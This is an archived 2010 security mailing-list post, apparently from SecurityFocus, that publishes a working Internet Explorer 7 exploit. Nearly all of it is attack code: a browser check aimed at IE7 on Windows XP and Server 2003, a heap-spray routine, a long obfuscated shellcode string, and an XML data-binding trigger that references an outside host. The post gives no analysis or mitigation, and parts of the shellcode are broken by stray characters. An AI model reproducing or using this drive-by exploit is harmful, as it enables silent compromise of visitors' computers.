Internet Explorer 7.0 0day Vulnerability Mar 20 2010 08:36PM
k4mr4n_St yahoo com
########################################################################
#######################
# Securitylab.ir
########################################################################
#######################
# Founded By: Unknown
# Published By: K4mr4n_st(at)yahoo(dot)com
# Special Thanks: N.S.T Security Team (Red Dragon) & Securitylab.ir
########################################################################
#######################

<script language="javascript">
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");

function sleep(milliseconds)
{
var start=new Date().getTime();

for(var i=0;i<1e7;i++)
{if((new Date().getTime()-start)>milliseconds)
{break}
}
}

function spray(sc)
{
var infect=unescape(sc.replace(/vangoik/g,"x25x75"));
var heapBlockSize=0x100000;
var payLoadSize=infect.length*2;
var szlong=heapBlockSize-(payLoadSize+0x038);
var retVal=unescape("%u0a0a%u0a0a");
retVal=getSampleValue(retVal,szlong);
aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
zzchuck=new Array();
for(i=0;i<aaablk;i++){zzchuck[i]=retVal+infect}
}

function getSampleValue(retVal,szlong)
{
while(retVal.length*2<szlong)
{retVal+=retVal}
retVal=retVal.substring(0,szlong/2);
return retVal
}

var a1="vangoik";
spray(a1+"9090"+a1+"vangoik9090vangoik9090vangoikE1D9vangoik34D9vangoik5
824vangoik5858vangoik3358vangoikB3DBvangoik031Cvangoik31C3vangoik66C9van
goikE981vangoikFA65vangoik3080vangoik4021vangoikFAE2vangoik17C9vangoik21
22vangoik4921vangoik0121vangoik2121vangoik214BvangoikF1DEvangoik2198vang
oik2131vangoikAA21vangoikCAD9vangoik7F24vangoik85D2vangoikF1DEvangoikD7C
9vangoikDEDEvangoikC9DEvangoik221Cvangoik2121vangoikD9AAvangoik19C9vango
ik2121vangoikC921vangoik206Cvangoik2121vangoik67C9vangoik2121vangoikC921
vangoik22FAvangoik2121vangoikD9AAvangoik03C9vangoik2121vangoikC921vangoi
k2065vangoik2121vangoik11C9vangoik2121vangoikC921vangoik22A8vangoik2121v
angoikD9AAvangoik2DC9vangoik2121vangoikC921vangoik2040vangoik2121vangoik
3BC9vangoik2121vangoikCA21vangoik7279vangoikFDAAvangoik4B72vangoik4961va
ngoik3121vangoik2121vangoikC976vangoik2390vangoik2121vangoikC4C9vangoik2
121vangoik7921vangoik72E2vangoikFDAAvangoik4B72vangoik4901vangoik3121van
goik2121vangoikC976vangoik23B8vangoik2121vangoikECC9va
ngoik2121vangoik7921vangoik76E2vangoik1DC9vangoik2125vangoikAA21vangoik1
2D9vangoik68E8vangoikE112vangoikE291vangoikD3DDvangoikAC8FvangoikDE66van
goikE27Evangoik1F7Avangoik26E7vangoik1F99vangoik7EA8vangoik4720vangoikE6
1Fvangoik2466vangoikC1DEvangoikC8E2vangoik25B4vangoik2121vangoikA07Avang
oik35CDvangoik2120vangoikAA21vangoik1FF5vangoik23E6vangoik4C42vangoik014
5vangoikE61Fvangoik2563vangoik420Evangoik0301vangoikE3A2vangoik1229vango
ik71E1vangoik4971vangoik2025vangoik2121vangoik7273vangoikC971vangoik22E0
vangoik2121vangoikF1DEvangoikDDAAvangoikE6AAvangoikE1A2vangoik1F29vangoi
k39ABvangoikFAA5vangoik2255vangoikCA61vangoik1FD7vangoik21E7vangoik1203v
angoik1FF3vangoik71A9vangoikA220vangoik75CDvangoikE112vangoikFA12vangoik
EDAAvangoikD9A2vangoik5C75vangoik1F28vangoik3DA8vangoikA220vangoik25E1va
ngoikD3CAvangoikEDAAvangoikF8AAvangoikE2A2vangoik1231vangoik1FE1vangoik6
2E6vangoik200Dvangoik2121vangoik7021vangoik7172vangoik7171vangoik7171van
goik7671vangoikC971vangoik2218vangoik2121vangoik38C9v
angoik2121vangoik4521vangoik2580vangoik2121vangoikAC21vangoi!
k4181van
goikDEDEvangoikC9DEvangoik2216vangoik2121vangoikFA12vangoik7272vangoik72
72vangoikF1DEvangoik19A1vangoikA1C9vangoikC819vangoik2E54vangoik59A0vang
oikB124vangoikB1B1vangoik55B1vangoik7427vangoikCDAAvangoik61ACvangoikDE2
4vangoikC9C1vangoikDE0FvangoikDEDEvangoikC9E2vangoikDE09vangoikDEDEvango
ik3099vangoik2520vangoikE3A1vangoik212Dvangoik3AC9vangoikDEDEvangoik12DE
vangoik71E1vangoikC975vangoik2175vangoik2121vangoikC971vangoik23AAvangoi
k2121vangoikF1DEvangoikA117vangoik051Dvangoik5621vangoikC92Bvangoik2360v
angoik2121vangoikDE12vangoikDE76vangoikC9F1vangoik20DAvangoik2121vangoik
DE49vangoik2121vangoikDE21vangoikC9F1vangoikDFC9vangoikDEDEvangoik7672va
ngoik1277vangoik71E1vangoikC975vangoik213Fvangoik2121vangoikC971vangoik2
374vangoik2121vangoikF1DEvangoikA117vangoik051Dvangoik5621vangoikC92Bvan
goik232Avangoik2121vangoikDE12vangoikDE76vangoik79F1vangoik7E7FvangoikE2
7Avangoik23CAvangoikE279vangoikD8C9vangoikDEDEvangoik77DEvangoikA276vang
oik29CDvangoikDDAAvangoik294Bvangoik1F76vangoik56DEvan
goikC935vangoik237Cvangoik2121vangoikF1DEvangoikDDAAvangoik4049vangoik44
4Cvangoik4921vangoik6468vangoik5367vangoikD5AAvangoik2998vangoik2121vang
oikD221vangoik5487vangoik4B0Evangoik1F21vangoik55DEvangoik0105vangoik05C
9vangoik2123vangoikDE21vangoikAAF1vangoikC9D9vangoik20EAvangoik2121vango
ikF1DEvangoikD91Avangoik2955vangoikAA17vangoik0565vangoik1F01vangoik21DE
vangoikDE1Fvangoik0555vangoikC93Dvangoik20CEvangoik2121vangoikF1DEvangoi
kE5A2vangoik7E31vangoik997Fvangoik2120vangoik2121vangoik49E2vangoik4F4Ev
angoik2121vangoik5449vangoik4D53vangoikCA4CvangoikAC34vangoik0565vangoik
7125vangoik03C9vangoikDEDFvangoik71DEvangoik6BC9vangoik2123vangoikC821va
ngoikDFC3vangoikDEDEvangoikC7C9vangoikDEDEvangoikA2DEvangoik29E5vangoik4
BE2vangoik494Dvangoik554Fvangoik4D45vangoik34CAvangoik65ACvangoik2505van
goikC971vangoikDCDAvangoikDEDEvangoikC971vangoik2302vangoik2121vangoik9A
C8vangoikDEDFvangoikC9DEvangoikDEC7vangoikDEDEvangoikE5A2vangoikE229vang
oik1249vangoik2113vangoik4921vangoik5254vangoik5344va
ngoik34CAvangoik65ACvangoik2505vangoikC971vangoikDCF0vangoik!
DEDEvang
oikC971vangoik20D8vangoik2121vangoikB0C8vangoikDEDFvangoikC9DEvangoikDEC
7vangoikDEDEvangoikE5A2vangoikE229vangoik4249vangoik5657vangoik4921vango
ik4952vangoik4E45vangoik34CAvangoik65ACvangoik2505vangoikC971vangoikDC86
vangoikDEDEvangoikC971vangoik20EEvangoik2121vangoik46C8vangoikDEDFvangoi
kC9DEvangoikDEC7vangoikDEDEvangoikE5A2vangoikE229vangoik5749vangoik5946v
angoikCA21vangoikAC34vangoik0565vangoik7125vangoikA3C9vangoikDEDCvangoik
71DEvangoik8BC9vangoik2120vangoikC821vangoikDF63vangoikDEDEvangoikC7C9va
ngoikDEDEvangoikA2DEvangoik25E5vangoikC9E2vangoik208Avangoik2121vangoik3
A49vangoik67E7vangoik7158vangoikE7C9vangoik2120vangoikA221vangoik29E5van
goikC9E2vangoik20B6vangoik2121vangoikCD49vangoik22B6vangoik712Dvangoik93
C9vangoik2120vangoikA221vangoik29E5vangoikC9E2vangoik20A2vangoik2121vang
oik8B49vangoik2CDDvangoik715DvangoikBFC9vangoik2120vangoikA221vangoik29E
5vangoikC9E2vangoik204Evangoik2121vangoikCC49vangoikCE77vangoik7117vango
ikABC9vangoik2120vangoikA221vangoik29E5vangoikC9E2vang
oik207Avangoik2121vangoikD149vangoik25ABvangoik717Evangoik57C9vangoik212
0vangoikA221vangoik29E5vangoikC9E2vangoikDFD6vangoikDEDEvangoik5949vango
ikFA49vangoik713Dvangoik43C9vangoik2120vangoikA221vangoik29E5vangoikC9E2
vangoik2012vangoik2121vangoikCE49vangoikC1EFvangoik7141vangoik6FC9vangoi
k2120vangoikA221vangoik29E5vangoikC9E2vangoik203Evangoik2121vangoik9149v
angoik0C68vangoik71FAvangoik1BC9vangoik2120vangoikA221vangoik29E5vangoik
C9E2vangoikDE17vangoikDEDEvangoik8A49vangoikBA7Fvangoik713Fvangoik07C9va
ngoik2120vangoikA221vangoik29E5vangoikC9E2vangoikDF86vangoikDEDEvangoik7
849vangoikA0B6vangoik7123vangoik33C9vangoik2120vangoikA221vangoik29E5van
goikC9E2vangoik21C2vangoik2121vangoik5F49vangoikC3F9vangoik7152vangoikDF
C9vangoik2121vangoikA221vangoik29E5vangoikC9E2vangoik21EEvangoik2121vang
oikBF49vangoik9AD8vangoik7114vangoikCBC9vangoik2121vangoikA221vangoik29E
5vangoikC9E2vangoikDFB3vangoikDEDEvangoik7649vangoik9481vangoik719Avango
ikF7C9vangoik2121vangoikA221vangoik29E5vangoikC9E2van
goikDF5FvangoikDEDEvangoik3B49vangoik3F5Bvangoik7123vangoikE!
3C9vango
ik2121vangoikA221vangoik29E5vangoikC9E2vangoikDF4BvangoikDEDEvangoikC149
vangoik117Avangoik71B5vangoik8FC9vangoik2121vangoikA221vangoik29E5vangoi
kC9E2vangoikDF77vangoikDEDEvangoikB649vangoikC3E8vangoik7182vangoikBBC9v
angoik2121vangoikA221vangoik29E5vangoikC9E2vangoikDF63vangoikDEDEvangoik
4949vangoikE405vangoik7192vangoikA7C9vangoik2121vangoikA221vangoik29E5va
ngoikC9E2vangoik2176vangoik2121vangoik5349vangoik92DFvangoik7137vangoik5
3C9vangoik2121vangoikA221vangoik29E5vangoikC9E2vangoikDF65vangoikDEDEvan
goik32CAvangoik444BvangoikC971vangoikDAD6vangoikDEDEvangoikC971vangoikDF
8AvangoikDEDEvangoik96C8vangoikDEDDvangoikC9DEvangoikDEC9vangoikDEDEvang
oikC9E2vangoikDC88vangoikDEDEvangoik6E49vangoik6ECEvangoik7124vangoik1FC
9vangoik2121vangoikA221vangoik29E5vangoikC9E2vangoik212Evangoik2121vango
ikAF49vangoik2F6Fvangoik71CDvangoik0BC9vangoik2121vangoikA221vangoik29E5
vangoik12E2vangoik45E1vangoik61AAvangoikA411vangoik59E1vangoik1F31vangoi
k61AAvangoik1F2Dvangoik51AAvangoik8C3DvangoikAA1Fvango
ik2961vangoikCAE2vangoik1F2Avangoik61AAvangoikA215vangoik5DE1vangoikAA1F
vangoik1D61vangoik41E2vangoikAA17vangoik054Dvangoik1705vangoik64AAvangoi
k171Dvangoik75AAvangoik5924vangoikF422vangoikAA1Fvangoik396BvangoikAA1Fv
angoik017BvangoikFC22vangoik1AC2vangoik1F68vangoik15AAvangoik22AAvangoik
12D4vangoik12DEvangoikDDE1vangoikA58Dvangoik55E1vangoikE026vangoik2CEEva
ngoikD922vangoikD5CAvangoik1A17vangoik055Dvangoik5409vangoik1FFEvangoik7
BAAvangoik2205vangoik47FCvangoikAA1Fvangoik6A2DvangoikAA1Fvangoik3D7Bvan
goikFC22vangoikAA1FvangoikAA25vangoikE422vangoikA817vangoik0565vangoik40
3DvangoikC9E2vangoikDA47vangoikDEDEvangoik5549vangoik5155vangoik0E1Bvang
oik560Evangoik5656vangoik430Fvangoik4840vangoik444Avangoik0F42vangoik4F4
2vangoik450Evangoik564Evangoik0E4Fvangoik4E4Avangoik440Fvangoik4459vango
ik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121
vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoi
k2121vangoik2121vangoik2121vangoik2121vangoik2121vang
oik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik21!
21vangoi
k2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121v
angoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik
2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121va
ngoik2121vangoik2121vangoik2121vangoik0021");

sleep(3000);

nav=navigator.userAgent.toLowerCase();
if(navigator.appVersion.indexOf('MSIE')!=-1)
{
version=parseFloat(navigator.appVersion.split('MSIE')[1])
}
if(version==7)
{
w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));
wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));
if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://vជ.k4mr4n.com src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');
var i=1;while(i<=10)
{
window.status=" ";i++}
}
</script>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus